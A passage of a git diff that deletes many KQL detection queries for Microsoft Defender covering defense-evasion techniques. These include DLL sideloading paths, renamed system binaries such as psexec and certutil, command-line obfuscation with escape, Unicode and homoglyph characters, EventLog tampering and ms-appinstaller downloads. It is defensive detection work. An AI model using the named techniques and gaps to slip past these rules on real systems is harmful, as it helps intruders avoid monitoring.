-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/26
-// Level: medium
-// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql
deleted file mode 100644
index cffa5dcf..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Escape_Characters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4
-// Date: 2018/12/11
-// Level: medium
-// Description: Detects potential commandline obfuscation using known escape characters
-// Tags: attack.defense_evasion, attack.t1140
-DeviceProcessEvents
-| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql b/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql
deleted file mode 100644
index 2dc00551..00000000
--- a/Defense Evasion/Potential_Commandline_Obfuscation_Using_Unicode_Characters.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/01/15
-// Level: high
-// Description: Detects potential commandline obfuscation using unicode characters.
-Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
-
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "â" or ProcessCommandLine contains "€" or ProcessCommandLine contains "£" or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "µ" or ProcessCommandLine contains "¶") or (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ") or (ProcessCommandLine contains "―" or ProcessCommandLine contains "—") or (ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql b/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql
deleted file mode 100644
index 598a6653..00000000
--- a/Defense Evasion/Potential_DLL_Injection_Or_Execution_Using_Tracker.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects potential DLL injection and execution using "Tracker.exe"
-// Tags: attack.defense_evasion, attack.t1055.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
deleted file mode 100644
index 7d53df8f..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbgcore.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
deleted file mode 100644
index 85e52e34..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/10/25
-// Level: medium
-// Description: Detects DLL sideloading of "dbghelp.dll"
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
deleted file mode 100644
index bafb67b9..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql b/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql
deleted file mode 100644
index 4c46541b..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Using_Coregen.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detect usage of DLL "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.
-// Tags: attack.defense_evasion, attack.t1218, attack.t1055
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
deleted file mode 100644
index d6f4a3c3..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/13
-// Level: medium
-// Description: Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ClassicExplorer32.dll" and (not(FolderPath startswith "C:\\Program Files\\Classic Shell\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql
deleted file mode 100644
index 7c55658c..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_DeviceEnroller.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/08/29
-// Level: medium
-// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql
deleted file mode 100644
index 4d8a43ae..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_JsSchHlp.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/14
-// Level: medium
-// Description: Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\JSESPR.dll" and (not(FolderPath startswith "C:\\Program Files\\Common Files\\Justsystem\\JsSchHlp\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql
deleted file mode 100644
index 418f4c38..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_VMware_Xfer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql b/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql
deleted file mode 100644
index 05e33118..00000000
--- a/Defense Evasion/Potential_DLL_Sideloading_Via_comctl32.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)
-// Date: 2022/12/16
-// Level: high
-// Description: Detects potential DLL sideloading using comctl32.dll to obtain system privileges
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local\\" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local\\" or FolderPath startswith "C:\\windows\\system32\\wermgr.exe.local\\")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql
deleted file mode 100644
index e1088872..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Binary_Rename.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/06/15
-// Level: medium
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "CONHOST.EXE", "7z.exe", "WinRAR.exe", "wevtutil.exe", "net.exe", "net1.exe", "netsh.exe", "InstallUtil.exe")) and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\7z.exe" or FolderPath endswith "\\WinRAR.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\InstallUtil.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql
deleted file mode 100644
index 9b1bd1ff..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Rename_Of_Highly_Relevant_Binaries.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113
-// Date: 2019/06/15
-// Level: high
-// Description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.
-// Tags: attack.defense_evasion, attack.t1036.003, car.2013-05-009
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription =~ "Execute processes remotely" or ProcessVersionInfoProductName =~ "Sysinternals PsExec" or (ProcessVersionInfoFileDescription startswith "Windows PowerShell" or ProcessVersionInfoFileDescription startswith "pwsh") or (ProcessVersionInfoOriginalFileName in~ ("certutil.exe", "cmstp.exe", "cscript.exe", "mshta.exe", "msiexec.exe", "powershell_ise.exe", "powershell.exe", "psexec.c", "psexec.exe", "psexesvc.exe", "pwsh.dll", "reg.exe", "regsvr32.exe", "rundll32.exe", "WerMgr", "wmic.exe", "wscript.exe"))) and (not((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\psexec.exe" or FolderPath endswith "\\psexec64.exe" or FolderPath endswith "\\PSEXESVC.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql b/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql
deleted file mode 100644
index 1a7fb871..00000000
--- a/Defense Evasion/Potential_Defense_Evasion_Via_Right-to-Left_Override.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/02/15
-// Level: high
-// Description: Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
-This is used as an obfuscation and masquerading techniques.
-
-// Tags: attack.defense_evasion, attack.t1036.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "‮"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql b/Defense Evasion/Potential_EACore.DLL_Sideloading.kql
deleted file mode 100644
index f843422e..00000000
--- a/Defense Evasion/Potential_EACore.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: high
-// Description: Detects potential DLL sideloading of "EACore.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\EACore.dll" and (not((FolderPath startswith "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Electronic Arts\\EA Desktop\\" and InitiatingProcessFolderPath contains "\\EACoreServer.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql b/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql
deleted file mode 100644
index fa643858..00000000
--- a/Defense Evasion/Potential_Edputil.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/09
-// Level: high
-// Description: Detects potential DLL sideloading of "edputil.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\edputil.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Defense Evasion/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql b/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql
deleted file mode 100644
index f6bdd5e5..00000000
--- a/Defense Evasion/Potential_EventLog_File_Location_Tampering.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: high
-// Description: Detects tampering with EventLog service "file" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Services\\EventLog" and RegistryKey endswith "\\File") and (not(RegistryValueData contains "\\System32\\Winevt\\Logs\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql b/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql
deleted file mode 100644
index 4f50439f..00000000
--- a/Defense Evasion/Potential_Fake_Instance_Of_Hxtsr.EXE_Executed.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/04/17
-// Level: medium
-// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
-HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
-Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Defense Evasion/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql b/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql
deleted file mode 100644
index 27f1e8dc..00000000
--- a/Defense Evasion/Potential_Goopdate.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: medium
-// Description: Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\goopdate.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\"))) and (not(((FolderPath contains "\\AppData\\Local\\Temp\\GUM" and FolderPath contains ".tmp\\goopdate.dll") and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\GUM" and InitiatingProcessFolderPath contains ".tmp\\Dropbox"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql
deleted file mode 100644
index fbde79fa..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceFileEvents
-| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql b/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql
deleted file mode 100644
index 879b3fc5..00000000
--- a/Defense Evasion/Potential_Hidden_Directory_Creation_Via_NTFS_INDEX_ALLOCATION_Stream_-_CLI.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
-// Date: 2023/10/09
-// Level: medium
-// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
-
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql
deleted file mode 100644
index 196cf067..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Micah Babinski, @micahbabinski
-// Date: 2023/05/07
-// Level: medium
-// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
-This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
-are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
-
-// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine 
contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql b/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql
deleted file mode 100644
index 41664742..00000000
--- a/Defense Evasion/Potential_Homoglyph_Attack_Using_Lookalike_Characters_in_Filename.kql
+++ /dev/null
@@ -1,10 +0,0 @@ -// Author: Micah Babinski, @micahbabinski -// Date: 2023/05/08 -// Level: medium -// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. - -// Tags: attack.defense_evasion, attack.t1036, attack.t1036.003 -DeviceFileEvents -| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ") \ No newline at end of file 
diff --git a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql b/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql deleted file mode 100644 index 3c74a001..00000000 --- a/Defense Evasion/Potential_Initial_Access_via_DLL_Search_Order_Hijacking.kql +++ /dev/null 
